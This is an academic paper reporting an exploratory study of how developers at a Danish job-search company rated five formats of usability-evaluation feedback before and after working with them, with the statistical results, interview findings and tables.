To facilitate the improvement of a system, feedback from usability evaluations often includes descriptions of a problem's severity (Kennedy, 1989; Dumas, 1989; Coble, Karat, & Kahn, 1997; Hornbæk & Frøkjær, 2005), the context of the problem (Kennedy, 1989; Nayak, Mrazek, & Smith, 1995), redesign proposals (Jeffries, 1993; Nayak et al., 1995; Dumas et al., 2004; Hornbæk & Frøkjær, 2005), and underlying causes of problems (Dumas, 1989). Practitioners and researchers also agree on the persuasive power of developers seeing users interact with the system (Schell, 1986; Mills, 1987; Dumas, 1989; Redish et al., 2002). Below we describe different approaches to providing feedback. An informal survey on an online forum for usability practitioners suggests that a usability report focusing on a list of problems is perhaps the most common way to feed back usability results to developers. The importance of presenting positive comments together with the UPs is often argued (Dumas et al., 2004). In a problem list each UP may be described by a short text and a severity rating; these ratings may be used to present a top-10 list of the most critical problems to help developers prioritize their work and cut down on the number of problems reported (Dumas, 1989; Nielsen, 1993; Nayak et al., 1995; Redish et al., 2002). A GUI binder is described as a collection of screendumps annotated with recommended usability enhancements (Nayak et al., 1995). This feedback format aims at providing developers with example-based references to support the development process. Nayak et al.
(Nayak et al., 1995) describe multimedia presentations as interactive documents that mix descriptive text with video highlights, pictures and graphics. The information is linked in a structure similar to web pages. As an elaboration of the video highlights used for multimedia presentations, Dumas and Redish discuss a professional video production that resembles video productions as we know them from TV, including a narrator, voiceover and examples from the test (Dumas & Redish, 1999). Redesign proposals are referred to as constructive input that provides developers with ideas for tackling problems (Hornbæk & Frøkjær, 2005). Redesign proposals can include a brief summary of the redesign, a justification of the proposed design, an explanation of the interaction and design decisions in the redesign and finally illustrations of how the redesign works (Jeffries, 1993; Hornbæk & Frøkjær, 2005). Scenarios can be defined as ‘a succinct story describing a user’s goal, start point, and intermediary factors that relate to product use’ (Kahn & Prail, 1993). They build upon results from real users (Nayak et al., 1995) and task analysis (Nielsen, 1993). Scenarios are only rarely mentioned as a way to provide feedback. This is surprising, since their strength is portraying context of use and user behaviour, which are important for understanding a problem. Human-centered stories are one type of scenario. In style they resemble fiction writing, using dialogue and describing the characters’ emotions and motivations (Strom, 2003). The value of oral feedback as a means to describe and initiate a dialogue about results is often mentioned in the literature (Butler & Ehrlich, 1993; Kahn & Prail, 1993; Dumas & Redish, 1999). Face-to-face presentation has the power to clear up potential misunderstandings in an engaging and convincing interaction between evaluator and developer.
2.2 Feedback research
Based on the lack of studies of feedback and the diversity of formats available, we need to study how developers assess feedback from usability evaluation. Cockton recently argued that usability studies are moving from looking at evaluations as merely being problem list generators to also dealing with the problems’ impact (Cockton, 2006). One line of work pointing in this direction is the work concerning downstream utility (John & Marks, 1997; Hornbæk & Frøkjær, 2005; Law, 2006), which concerns the effectiveness with which a solution to a UP is implemented. In a study of downstream utility, Law points to issues such as ‘credibility’ as a key factor for effective feedback (Law, 2006) and describes how developers need to be convinced about, for example, the evaluator’s expertise before taking the feedback to heart. She suggests that the persuasive power of feedback lies in providing the developers with information about the severity of the usability problem and the problem frequency, as well as elaborate and accurate problem descriptions. Redesign proposals and an estimated fixing effort are also mentioned to be of importance for good feedback. At the opening plenary at the Usability Professionals Association Annual Meeting in 1993, Jared Spool from the consultancy User Interface Engineering suggested that usability professionals take a closer look at how they deliver usability feedback, arguing that evaluators should ‘take their own medicine’ when it comes to the usability of their feedback (as referred to in (Nielsen, 1994)). A recent special issue also called for more research on the ‘various form of feedback in which the results of usability evaluation is presented to developers’ in order to examine persuasiveness and impact (Hornbæk & Stage, 2006). This explorative study aims at investigating how such various formats convince developers and provide them with an understanding of usability problems.
The short-term goal is to gain better knowledge of how evaluators should present their feedback to developers in order for it to be understood and used. The long-term goal is to make evaluation a more powerful player in software development, something only rarely the case today (Hornbæk & Stage, 2006).

3 Method
To identify effective ways of providing feedback, we investigated how five different feedback formats influence usability work in a Danish company. This setup was chosen because it allowed us to study a running system in realistic settings and provided an opportunity to investigate how developers assess feedback when it is first presented to them, and how they rate the same feedback once they have worked with it. The explorative study was performed in eight steps. The system was tested, and problems were identified and merged into groups. The problem descriptions were then formatted according to five feedback formats, and developers assessed these on five questions. The developers worked with the feedback, assessed it and were finally interviewed about their assessments. The eight steps are described in detail below (see also Figures 1 and 2). As the five questions show (questions 1-5, Table 2), the study was designed to investigate how different feedback formats convinced and provided developers with an understanding of the usability problems. We hypothesised that the first impressions of the feedback and the ratings after use (referred to as pre and post use) would vary, since working intensively with a format might bring the developers to appreciate certain qualities of a format. We also expected the study to provide qualitative data on how to improve feedback from evaluations to developers. The company in question is Jobindex, a non-hierarchically organised company with 37 employees that provides web-based services related to job searching. The three developers who participated in the explorative study comprise the development team concerned with systems development.
3.1 Step one – testing the application
A think-aloud test of the system comprised six test sessions and followed the guidelines of (Dumas & Redish, 1999). Jobindex identified the area of interest and approved the tasks for the test. The test sessions were recorded on digital video using a webcam and TechSmith's Morae software. The goal of the test was to sample a set of usability findings for the study, not to uncover every issue in the application.

3.2 Step two – analysing the results
To identify UPs, the two evaluators discussed and analysed the test results immediately after each test session, as recommended by (Nørgaard & Hornbæk, 2006). After the six sessions the usability findings were consolidated and described with a title, a description of the problem, severity, the context in which the problem occurred and one or more redesign ideas. As recommended by Dumas and Redish (Dumas & Redish, 1993) we included positive findings (PFs). At the end of step two 75 usability findings had been described, comprising 67 UPs and eight PFs.

3.3 Step three – merging usability findings into 40 groups
To eliminate duplicates, the 75 usability findings were merged into groups of related problems. The usability findings were merged by rough similarity until 40 groups had emerged. This limit was set to ensure that the developers would get experience in working with each feedback format during step six in the study. Each group consisted of one to six usability findings.

3.4 Step four – turning the findings into feedback items
We chose to investigate five feedback formats that represent different approaches to providing feedback from evaluations. As mentioned above, the formats were chosen based on our literature review and an informal survey amongst practitioners. The list of problems (P) consists of a description and a severity rating of the UPs. Severity is rated according to a five-step scale (Dumas, 1989).
The format is included in the study since it is a common way to present usability feedback that can be produced at low cost. The problem list took approximately half a day to prepare. The GUI binder (G) consists of screendumps annotated with information about where the UP occurred, a brief description of the UP and a description of one or more possible solutions. The GUI binder is included in the study because it can be produced at a fairly low cost and because it primarily focusses on presenting the context of the problem and only briefly touches upon possible redesign issues. The GUI binder took approximately one day to prepare. The multimedia presentation (M) consists of linked html-documents containing a description of the problem, a video with examples of user interaction, a description of one or more solutions, a graphical illustration of severity, illustrative drawings that help to skim the content, illustrations of both problem and possible solution, and finally a short explanation of the illustrations. This format is included in the study because it addresses the recommendations to let developers see real users interact with the system. Also, the multimedia presentation might be more enjoyable to work with since it presents its information in an engaging and varied manner. The multimedia presentation took approximately three days to prepare. The redesign proposals (R) consist of a brief description of the UP, a description of one or more solutions, a justification of the solutions, illustrations of the solutions and finally a short text explaining the illustrations. Redesign proposals are included because justifications ought to make them a convincing format and the ideas for solutions ought to improve the understanding of the UP and facilitate the actual fixing of the problems. The redesign proposals took approximately a day and a half to prepare. Representing scenarios in this study we chose to use human-centered stories (H).
These are expected to be persuasive and to provide valuable information about the context of use. In this study a human-centered story is approximately one page long and consists of six lines of introduction (presenting the characters and ‘setting the stage’) and a narrative that describes a problem, the context and the user’s motivation and feelings in the situation. The human-centered stories took approximately two days to prepare. The feedback was presented to the developers on paper (formats PGRH) and CD-rom (format M). We found this the most flexible approach and in accordance with common practice. Despite numerous recommendations to interact with developers (Butler & Ehrlich, 1993; Kahn & Prail, 1993; Dumas & Redish, 1999), this explorative study refrains from studying oral feedback. This is not to underestimate the high value of oral feedback, but to emphasize the importance of the deliverables that support the oral feedback and serve as documentation and a reminder for developers during their work.

3.4.1 Producing comparable feedback items
The five formats PGMRH comprise a combination of different descriptive elements such as text, illustrations and severity ratings. We produced a series of descriptive elements to be copy-pasted when we constructed the feedback according to the five formats. We did this to improve the comparability between the formats. For example, the same rating would be used for all formats using severity ratings. Step four resulted in a total of 200 so-called feedback items, comprising 35 UPs and 5 PFs described by five feedback formats (see Figure 1).

3.5 Step five – pre use rating of feedback items
In order to rate the value of the feedback items, the 200 items were presented to three developers at Jobindex who usually receive and take care of usability feedback. A description of the test set-up, the participants and the tasks was also provided. The 200 items were presented in random order so that no one feedback format was favoured by being presented first.
Each feedback item was presented with a rating sheet on which each developer individually would assess every feedback item according to the questions in Table 2. The questions were intended to shed light on issues such as usefulness, persuasive power and clarity; issues that are crucial for the feedback’s quality. To answer the questions, the developer would mark a point on a 100 mm horizontal line. Each end of the line was marked with the labels shown in parentheses after the questions (e.g., ‘very poorly’/’very well’). This method of measuring is inspired by (Frøkjær & Hornbæk, 2005) and lets the developers answer the questions without being constrained by a small number of categories on the scale. The scale is quantified by measuring the millimetres from the start point to the point on the line marked by the developer. Each developer spent approximately four hours rating the feedback items.

3.6 Step six – putting the feedback items into action
After the developers had rated their first impressions of the feedback we wanted to study how they would use the feedback in their daily work. Each developer received a set of the 40 usability findings; 32 usability findings in print (covering feedback formats PGRH equally) and the remaining eight usability findings on a CD-rom (M). The feedback items were selected at random from the set of 200 feedback items produced in step four. The developers were instructed to carry out their work on the system as if they had received any other usability report. This was done so the developers could familiarize themselves with, and perhaps change their opinions about, some of the feedback items once they had gained experience using them. The developers worked with the feedback items for approximately 12 weeks in between their other tasks at Jobindex.
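The quantification of the 100 mm rating scale in step five is straightforward to express in code. The sketch below is purely illustrative: the function name and the example marks are our own inventions, since the study does not publish the raw measurements.

```python
# Minimal sketch of quantifying a 100 mm visual-analogue scale:
# a developer's mark is measured in millimetres from the left anchor
# of the line, giving a 0-100 score per question per feedback item.

def vas_score(mark_mm, line_mm=100):
    """Convert a mark position (mm from the left anchor) to a 0-100 score."""
    if not 0 <= mark_mm <= line_mm:
        raise ValueError("mark must lie on the line")
    return 100 * mark_mm / line_mm

# Hypothetical marks (in mm) by one developer on the five questions
# for a single feedback item:
marks = [78, 65, 82, 54, 70]
scores = [vas_score(m) for m in marks]
item_mean = sum(scores) / len(scores)
print(f"item mean: {item_mean:.1f}")  # prints: item mean: 69.8
```

With the default 100 mm line the measured millimetre value is itself the score; the helper merely generalizes to other line lengths and guards against off-scale marks.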
3.7 Step seven – post use rating of feedback items
Having finished the work on the system the developers repeated step five, this time rating just the 40 feedback items they had been working with, keeping their actual work experiences in mind. Each developer spent approximately one and a half hours on this task.

3.8 Step eight – individual interviews
Finally, the developers were interviewed individually. They were presented with and asked to discuss examples of the feedback items they had rated highest and lowest. They were also asked to discuss the significance of positive findings. Finally they were asked to perform a card sorting exercise in which they discussed the value of feedback elements such as severity ratings, video and contextual screendumps. The aim of the interviews was to get finer nuances on the developers’ opinions, collect anecdotal data about their experiences with the feedback formats, and collect ideas for improving feedback on usability evaluation. During the interviews, points and opinions were captured directly on the relevant feedback items. The interviews were afterwards documented with thorough notes; two of the interviews were additionally audio recorded.

4 Results
4.1 Pre use rating
Table 1 presents an overview of the developers’ mean pre use ratings of the five feedback formats. To protect against inflation of the experiment-wide error rate, we first analyzed the pre use ratings using analysis of variance (ANOVA). This test suggests significant differences between feedback formats (see Table 1). Post hoc tests point to redesign proposals, the multimedia presentation and the GUI binder as being rated equal and significantly better than the problem list, which in turn is rated better than human-centered stories. To illustrate this, developers rate redesign proposals highest in 40% of the cases, the multimedia presentation in 31% of the cases, the GUI binder in 23% of the cases, and the problem list in 6% of the cases. Human-centered stories were never rated highest.
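The omnibus test reported above can be sketched as a plain one-way ANOVA over ratings grouped by format. The study's raw ratings are not published, so the numbers below are invented solely to mirror the reported ordering (R, M and G above P, and P above H); only the F-statistic computation itself is general.

```python
# Illustrative one-way ANOVA over pre use ratings for the five formats
# (P, G, M, R, H). Data are hypothetical, not the study's measurements.
from statistics import mean

ratings = {                     # made-up 0-100 scale scores
    "P": [55, 60, 58, 52, 57],
    "G": [72, 75, 70, 74, 71],
    "M": [70, 73, 69, 75, 72],
    "R": [74, 78, 73, 76, 75],
    "H": [35, 40, 38, 33, 36],
}

def one_way_anova(groups):
    """Return (F, df_between, df_within) for a dict of samples."""
    all_values = [x for g in groups.values() for x in g]
    grand_mean = mean(all_values)
    k = len(groups)                       # number of formats
    n = len(all_values)                   # total observations
    ss_between = sum(len(g) * (mean(g) - grand_mean) ** 2
                     for g in groups.values())
    ss_within = sum((x - mean(g)) ** 2
                    for g in groups.values() for x in g)
    df_between, df_within = k - 1, n - k
    f_stat = (ss_between / df_between) / (ss_within / df_within)
    return f_stat, df_between, df_within

f_stat, df1, df2 = one_way_anova(ratings)
print(f"F({df1},{df2}) = {f_stat:.2f}")
```

A large F relative to the F-distribution's critical value for the given degrees of freedom indicates that mean ratings differ between formats; post hoc pairwise tests would then locate which formats differ, as done in the study.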
To investigate these differences we conducted individual analyses of variance on each question. Table 2 shows how the significant groups change between questions. Of the three top-rated formats (GMR), R is rated significantly higher than M on a question concerning whether a feedback item helps the developer solve the problem. M seems on the other hand to be slightly better at convincing the developer about the problem. The difference from G and R is not significant, though. Despite the small variances across questions, the ratings generally support the picture from Table 1 of the GUI binder, the multimedia presentation and redesign proposals as being the most valued feedback formats. We found no significant effect of the order of presentation on the ratings, F(7,167) = 0.54, p = .921, suggesting that having seen other presentations of a UP does not affect how a developer rates a feedback item.

4.2 Post use ratings
Table 1 also shows the mean ratings the developers made of the five feedback formats after having worked with them for three months. An overall MANOVA shows that there are no significant differences in how the five formats are rated after use. An analysis of the ratings of each specific question confirmed the result. A comparison of the ratings given to identical feedback items pre and post use (Figure 3) shows that all five questions receive lower ratings in the post use rating. The only exception is human-centered stories (H), which generally receive the same rating.

4.3 Interviews
We analyzed and consolidated the notes from the interviews into 14 groups of similar opinions. Four of these identified general parameters that make feedback useful to developers: the problem can be recognized, the problem is easy to fix, the feedback contains much information about the problem’s context, and the feedback is quick and easy to use. Ten groups concerned the feedback formats (Table 4).
4.3.1 General findings – explaining high and low ratings
The interviews showed that the top rated feedback items had some general characteristics in common. First, the problems were recognizable to the developer, meaning that the developer knew about them already. As an example, developer 3 (Dev3) explains: ‘This is a much more recognizable problem. I know it is annoying. It is a problem I have been in contact with before’. Second, the problems that received high ratings were considered easy to fix: ‘It’s a change that can be easily overcome…that’s why it has a higher rating’ (Dev3). Six out of ten high rated feedback items were explained with the fact that the developers agreed with the problem. Five of ten high rated feedback items were explained with the problems being easy to fix. The lowest rated feedback items also showed similarities. A low rated feedback item often described a problem that was hard to recognize, either because the developer was not convinced about the problem, or because he needed more contextual information to understand it. Dev2 points to one reason for not being convinced and wanting more context about a problem: ‘I am not able to deduct the cause of the problem from this feedback’. Five of ten low rated feedback items were explained with the fact that the developer disagreed with the problem or found it impossible to solve. The developers explained four of ten low rated items with not being able to understand the problem, for example: ‘I have trouble understanding what it is… I mean what search words the user typed… I understand that the user has typed something and has an expectation about finding something… but I have a hard time understanding what it is’ (Dev1). Generally the developers value access to contextual information, and several formats are criticized for not describing enough context. ‘I need to know more’, Dev1 points out when discussing several low rated feedback items. Conversely, formats heavy on context are not without problems.
Feedback formats that elaborate on the context of use are either criticized for being tedious to use (M) or rated poorly throughout the explorative study (H). This suggests that developers consider a format’s ease of use an important parameter when assessing how the format performs.

4.3.2 Details on the five formats
The developers criticize human-centered stories for being time consuming and ‘full of noise’, as Dev1 puts it. Dev3 joins the criticism with the view that H does not really help to fix the problem and that it is often difficult to understand what the problem is. ‘It does surprise that you can still be unsure of what the problem is after having read the long text’, he explains. On the positive side, H ‘shows you where you lose the user’ (Dev1) and provides contextual information about the UP, which helps to understand the problem (Dev2). Problem lists are considered fully sufficient for presenting uncontroversial UPs, and Dev2 describes how he uses the severity rating to estimate whether he is ‘on the same level as the evaluator’. This is an important part of convincing him about the nature of the problem. Dev3 criticizes P for lacking contextual information: ‘The problem has been boiled down to one line of text. It can be difficult to understand [the problem] because the description is too short and it does not include any description of context, suggestions for solutions or anything. I often catch myself thinking “what am I supposed to do with this?”’ The multimedia presentation is mostly valued for the videos by Dev2, who explains how videos provide fine nuances about the context and the use of the system. Dev1 and Dev3, on the other hand, value the possibility to dig into a video, but find that the UPs are generally easily understood without seeing the video. They find describing simple UPs with video unnecessary and criticize M for being too time consuming because of the videos.
Dev1 explained how he found the video in M tedious because it was difficult to get a quick overview and to skim the content: ‘I cannot fast forward to the point of the video’, he criticizes. He suggests providing a textual description of the video’s story line, using H as a model. Dev3 supports this idea. The developers do not find that graphical illustrations add any value and call for more thoroughly explained severity ratings. Dev1 comments on G that screendumps are often easier to understand than text. Dev2 repeats this point for the textual redesign proposals: text can be difficult to understand, and an illustration of the redesign proposals as support for the text is desired. Dev2 explains how the redesign proposals in R make it easier to understand and accept the critique. He explains how the fact that the evaluator has to illustrate his redesign ideas improves the quality of these. All three developers agree that the justification for the redesign proposal is unnecessary: ‘A good idea should speak for itself’, according to Dev1. The feature of directly pointing to where the UP occurred received positive comments from all three developers. Dev2 explained how M let him jump from the problem description to an illustration of where the problem occurred, and that this setup was very easy to act on. Dev3 points out a positive feature of G: ‘It gets pinpointed where it [the problem] is’. Formats RGM all include the feature of illustrating where the UP occurred.

4.4 UP characterization
The ratings of the different feedback formats may depend on the nature of the problems. To investigate this, five researchers rated the 35 UPs according to (a) discoverability: how easily they were discovered, and (b) complexity: the perceived complexity of fixing the problem. Discoverability was coded according to the scale perceptible, actionable and constructable (Cockton & Woolrych, 2001).
Complexity was coded with inspiration from (Hornbæk & Frøkjær, 2004) using a three-step scale comprising complex, medium-sized and simple problems. The average complexity-discoverability ratio is shown in Table 4, and suggests that the UPs used in this study are mostly simple and perceptible/actionable. To get an impression of whether the most heavyweight UPs were rated differently than the rest of the UPs we studied the ratings of the six UPs from the bottom-right corner of Table 3. On average the heavyweight UPs were rated 8% lower than the rest of the UPs pre use, though this difference is not significant, F(1,173) = 1.757, p > .1.

4.5 Low answering rate for PFs
On average each developer answered 95% of the questions pre use and 98.5% post use. The only apparent pattern in the unanswered questions was a low answering rate for PFs. This phenomenon can be explained by the fact that three of the five questions specifically concerned UPs. In the interviews the developers expressed general satisfaction with receiving PFs, and pointed to the fact that it is nice to know which parts of the system work and should not be changed. Dev2 also mentioned the psychological effect of combining negative with positive feedback in order for the critique to be ‘easier to swallow’.

5 Discussion
5.1 Comparing feedback formats
Our explorative study suggests that the multimedia presentation, the GUI binder and the redesign proposals were generally seen as useful input to the developers’ work, whereas the human-centered stories were not well received. The problem list was generally rated lower than the three top formats and higher than the human-centered stories. The explorative study suggests that feedback serves several functions, which change over time. Understanding the problem and being convinced about it is of initial importance to feedback. Information about a problem’s context plays a role for both understanding and a problem’s ability to convince.
It elaborates the problem, making it easier to understand, and provides information on what caused the problem, thus making it more convincing. When the developer is convinced about the problem and understands it, whether the feedback is easy to use gains importance. Ease of use and thorough contextual information seem quickly to conflict, however. When the developer has worked with the problem for a while the feedback finally needs to serve as a reminder to the developer. Below we discuss how the five feedback formats relate to these issues. The problem list is generally rated lower than the GUI binder, the multimedia presentation and redesign proposals, suggesting that the most commonly used feedback format is not the most effective one. Descriptions of problems seem best suited for communicating simple and uncontroversial UPs where no contextual information is needed. We argue that some of the recommendations to improve problem lists, such as ‘be more positive, clear, precise and respectful’ (Dumas, 1989), do not fully address the challenges associated with the problem list. Problem lists do not provide any explanations to bolster their problem descriptions, and the format’s ability to convince seems mostly to rest on the evaluator’s ethos and assertiveness. We found that developers used severity ratings to assess the evaluator’s credibility and conclude that well argued severity ratings make problem lists more credible. The GUI binder, which can be produced at fairly low cost, is generally rated equal to the multimedia presentation and redesign proposals. Seemingly, the context provided by the annotated screendumps is valued greatly by developers as facilitating a better understanding of the problem. The GUI binder only shows where the problem occurred and gives no information about what led to the problem, e.g. compared to the multimedia presentation.
This suggests that information about problem occurrence is more important to developers than contextual feedback about, for instance, users’ interactions with the system. The multimedia presentation proved less convincing than suggested by the literature on highlights videos. ‘Seeing is believing’ is a common argument for videos (Desurvire & Thomas, 1993), but our explorative study suggests that other formats are equally convincing. Developers call for easier access to contextual information than video. However, this critique acknowledges contextual information like the one presented by the videos in the multimedia presentation as being important to understanding the problems. The high ratings of redesign proposals suggest that they serve as a valuable elaboration of the problem description that makes the UP more understandable to developers. This supports the findings of (Hornbæk & Frøkjær, 2005) and suggests that the quality of descriptions of even fairly simple problems is heightened by redesign proposals. The psychological effect of receiving constructive suggestions rather than negative criticism may explain why developers find the format convincing, an important quality overlooked by (Hornbæk & Frøkjær, 2005). Human-centered stories may perform poorly on the feedback dimension of understanding because they require the reader to analyze and interpret the narrative before being able to understand the problem. The fictional style of the presentation might also be problematic since it apparently is found unconvincing by developers, something that might be addressed by modifying the narrative style of writing. Human-centered stories are, however, not designed for providing feedback on usability problems.

5.2 Feedback issues of importance to developers
The explorative study suggests that developers rate UPs that they agree with higher than the ones they do not agree with. This finding underlines the importance of feedback formats’ ability to convince.
Easily fixed problems also seem to be rated higher than problems that are not easily fixed. This finding supports reports on how developers have a tendency to favour the problems easiest to correct (Dumas & Redish, 1999). We were surprised to find that heavyweight UPs were rated lower than lightweight ones, since we expected heavyweight problems to be of more importance to system development and thus to developers. Developers value contextual information, which may explain why the multimedia presentation, GUI binder and redesign proposals, which all describe context such as problem occurrence, are initially preferred by developers. The need for contextual information is linked to developers’ wish to investigate certain UPs in depth in order to obtain a better understanding of the problem or to search for convincing factors about the problem. 5.3 Differences in pre and post ratings The differences in how developers rate feedback formats diminish after they have worked with the feedback items. Since we expected the developers to familiarize themselves with and develop preferences for certain formats during their work with the UPs, we were surprised to find that the post-use ratings showed no significant differences between the formats. Developers assessed the same questions before and after having worked with the problems. We hypothesize that the questions were perceived differently pre and post use. As we have no way of knowing, we will refrain from speculating on what the difference in meaning is. We dare to conclude that when first learning about and having to understand a problem, the GUI binder, the multimedia presentation and redesign proposals are superior to problem lists and human-centered stories. However, any of the formats serves as a reminder of that problem. The change in the role and rating of feedback over time suggests that studies solely concerning pre-use evaluation results are problematic.
We suggest future work on the various stages and roles of feedback. 5.4 Ideas for improving feedback Developers seem sensitive to information overload, and we need to investigate how thorough contextual information can be presented in the least overwhelming manner. A multimedia presentation providing the possibility to study relevant and discard irrelevant information might be a solution. Indexed videos might speed up navigation in a short highlights video, but this does not remedy the fact that some problems are poorly explained in a short video. Summaries of the videos modeled on human-centered stories (as a kind of reverse video manuscript) might improve the ease of use of contextual information and leave room for the evaluator to elaborate on the problems that are difficult to illustrate with video. However, since human-centered stories are not considered highly convincing, this idea is not without problems. Longer problem descriptions with elaboration of the causes of the problem might also improve problem lists. Screendumps of where the problem occurred also seem to be valued, easily produced information and may, for GUI problems, serve as a reference for a redesign proposal. 6 Conclusion The present explorative study aims to investigate how five feedback formats serve to convince and provide an understanding of usability problems. The study suggests that feedback serves multiple purposes, which change over time. Initially, feedback needs to convince developers and help them understand the problem. The degree to which a feedback format provides contextual information is crucial to how well it succeeds in convincing and explaining the problem. Having accomplished that, feedback must be easy to use in the developers’ daily work. Hereafter it mainly serves as a reminder of the usability problem (Dumas & Redish, 1993). Developers rate the multimedia presentation, redesign proposals and the GUI binder with annotated screendumps highest on first-hand impression.
However, after having worked with the feedback, developers rate problem lists, the GUI binder, the multimedia presentation, redesign proposals and the scenario format human-centered stories alike. The findings suggest that all feedback formats may serve as a reminder, but only some provide the information needed to be convincing and helpful in understanding the problem. Problem lists, which are perhaps the most common feedback format, do not provide sufficient information to perform well on first-hand impressions, and need to include additional information before providing developers with efficient feedback. Tables and figures (in order of reference) Figure 1: The study consists of eight steps. The figure shows how the usability test (step 1) is followed by analysis of 75 UPs (step 2) and merging these into 40 UPs (step 3). Finally, five feedback items are constructed for each UP, a total of 200 items (step 4). Figure 2: Three developers rate the usefulness of the 200 feedback items (step 5). They then work with 40 selected items (step 6) and re-rate them after completing their work (step 7). The developers are finally interviewed about the use of the formats (step 8). Table 1: Average pre and post use ratings of questions 1-5 organized by feedback format.
<table> <thead> <tr> <th>Problem lists (P)</th> <th>GUI binder (G)</th> <th>Multimedia presentation (M)</th> <th>Redesign proposal (R)</th> <th>Human-centered stories (H)</th> <th>F-test</th> <th>Tukey HSD post hoc tests</th> </tr> </thead> <tbody> <tr> <td>Pre use</td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td>M, SD</td> <td>M, SD</td> <td>M, SD</td> <td>M, SD</td> <td>M, SD</td> <td></td> <td></td> </tr> <tr> <td>45.3, 12.5</td> <td>54.0, 10.9</td> <td>53.8, 12.1</td> <td>57.0, 11.2</td> <td>31.6, 9.9</td> <td>F(4,170)=28.76, p&lt;.001</td> <td>H&lt;P&lt;MGR</td> </tr> <tr> <td>Post use</td> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> <tr> <td>40.5, 14.0</td> <td>42.1, 17.1</td> <td>50.2, 14.6</td> <td>43.5, 12.6</td> <td>32.4, 14.0</td> <td>F(4,30)=1.35, p&gt;.3</td> <td>HPMGR</td> </tr> </tbody> </table> Table 2: Average pre use ratings of formats PGMRH according to questions Q1-Q5. Where a format is listed in two significant groups (e.g. G in Q3), the format is not significantly different from either group. <table> <thead> <tr> <th>Problem List (P)</th> <th>GUI binder (G)</th> <th>Multimedia presentation (M)</th> <th>Redesign proposals (R)</th> <th>Human-centered stories (H)</th> <th>F-test</th> <th>Tukey HSD post hoc tests</th> </tr> </thead> <tbody> <tr> <td>M</td> <td>SD</td> <td>M</td> <td>SD</td> <td>M</td> <td>SD</td> <td>M</td> </tr> <tr> <td>Q1: How useful is the feedback item to your work on Jobindex.dk? (not useful/very useful)</td> <td>58.1</td> <td>13.0</td> <td>61.9</td> <td>11.1</td> <td>60.0</td> <td>9.8</td> </tr> <tr> <td>Q2: How well does the feedback item help you understand the problem? (poorly/very well)</td> <td>59.1</td> <td>16.4</td> <td>67.6</td> <td>11.8</td> <td>69.0</td> <td>14.7</td> </tr> <tr> <td>Q3: How well does the feedback item help you solve the problem?
(poorly/very well)</td> <td>28.5</td> <td>12.7</td> <td>45.2</td> <td>15.7</td> <td>43.1</td> <td>17.5</td> </tr> <tr> <td>Q4: How convinced are you that this is a problem? (poorly/very well)</td> <td>44.6</td> <td>15.3</td> <td>50.6</td> <td>14.4</td> <td>54.0</td> <td>13.8</td> </tr> <tr> <td>Q5: How easy is the feedback item to use in your work on Jobindex.dk? (difficult/very easy)</td> <td>36.0</td> <td>15.1</td> <td>44.7</td> <td>14.4</td> <td>43.0</td> <td>15.7</td> </tr> </tbody> </table> Table 3: The feedback formats’ strengths and weaknesses <table> <thead> <tr> <th>Pros</th> <th>Cons</th> </tr> </thead> <tbody> <tr> <td>P</td> <td></td> </tr> <tr> <td>Provides short and sufficient information about simple UPs.</td> <td>Does not describe context of UP.</td> </tr> <tr> <td>Ratings of severity.</td> <td>A bit too short to describe problems fully.</td> </tr> <tr> <td>G</td> <td></td> </tr> <tr> <td>Points to where the UP should be fixed.</td> <td>The problem’s context and triggers need to be elaborated.</td> </tr> <tr> <td>Screendumps are concrete and often easier to understand than text.</td> <td>An illustration of the redesign proposal is lacking.</td> </tr> <tr> <td>M</td> <td></td> </tr> <tr> <td>Video is credible and persuasive.</td> <td>‘Overkill’ to describe simple problems with video.</td> </tr> <tr> <td>Quick and easy to use.</td> <td>Video is too time consuming and it is difficult to get a quick overview of the video</td> </tr> <tr> <td>R</td> <td></td> </tr> <tr> <td>Helps solve the problem well.</td> <td>The problem’s context and triggers are not explained well.</td> </tr> <tr> <td>Illustrations improve quality of redesign proposals.</td> <td>A justification is unnecessary.</td> </tr> <tr> <td>H</td> <td></td> </tr> <tr> <td>Provides information about the context of a UP.</td> <td>‘Overkill’ – it is not a simple way to present a problem. 
There is a lot of ‘noise’.</td> </tr> <tr> <td>Shows where you ‘lose’ the user in the interaction.</td> <td>Time consuming to read and interpret.</td> </tr> </tbody> </table> Figure 3: Developers generally rate the 35 UPs lower after having worked with them. The only exception to this trend is H, which in general receives a slightly improved rating. Table 4: The 35 UPs' complexity and discoverability cluster in the top left corner, suggesting that the UPs used in this study are fairly easy to spot and simple to mend. <table> <thead> <tr> <th></th> <th>Perceivable</th> <th>Actionable</th> <th>Constructable</th> </tr> </thead> <tbody> <tr> <td>Simple</td> <td>11</td> <td>15</td> <td>0</td> </tr> <tr> <td>Middle</td> <td>3</td> <td>4</td> <td>1</td> </tr> <tr> <td>Complex</td> <td>0</td> <td>1</td> <td>0</td> </tr> </tbody> </table>
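The F-tests reported in Tables 1 and 2 are one-way ANOVAs over the five formats' ratings, followed by Tukey HSD grouping. As a sketch of the underlying arithmetic only (the rating data below is invented for illustration and is not the study's data), the F statistic is the between-group mean square divided by the within-group mean square:

```python
def one_way_anova_f(groups):
    """One-way ANOVA F statistic for a list of samples.

    F = (between-group mean square) / (within-group mean square),
    with k - 1 and N - k degrees of freedom for k groups, N total ratings.
    """
    k = len(groups)
    n_total = sum(len(g) for g in groups)
    grand_mean = sum(sum(g) for g in groups) / n_total

    # Between-group sum of squares: distance of each format's mean rating
    # from the grand mean, weighted by group size.
    ss_between = sum(len(g) * (sum(g) / len(g) - grand_mean) ** 2 for g in groups)
    # Within-group sum of squares: rating spread inside each format.
    ss_within = sum(sum((x - sum(g) / len(g)) ** 2 for x in g) for g in groups)

    df_between = k - 1
    df_within = n_total - k
    return (ss_between / df_between) / (ss_within / df_within), df_between, df_within

# Hypothetical 0-100 ratings for the five formats P, G, M, R, H.
ratings = [
    [45, 48, 42],  # P
    [54, 55, 53],  # G
    [53, 56, 52],  # M
    [57, 58, 56],  # R
    [31, 33, 30],  # H
]
f_stat, df1, df2 = one_way_anova_f(ratings)
print(f"F({df1},{df2}) = {f_stat:.2f}")
```

With k = 5 formats, the first degrees-of-freedom value is always 4, matching the F(4,170) and F(4,30) shapes reported in Table 1; the second grows with the number of ratings.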
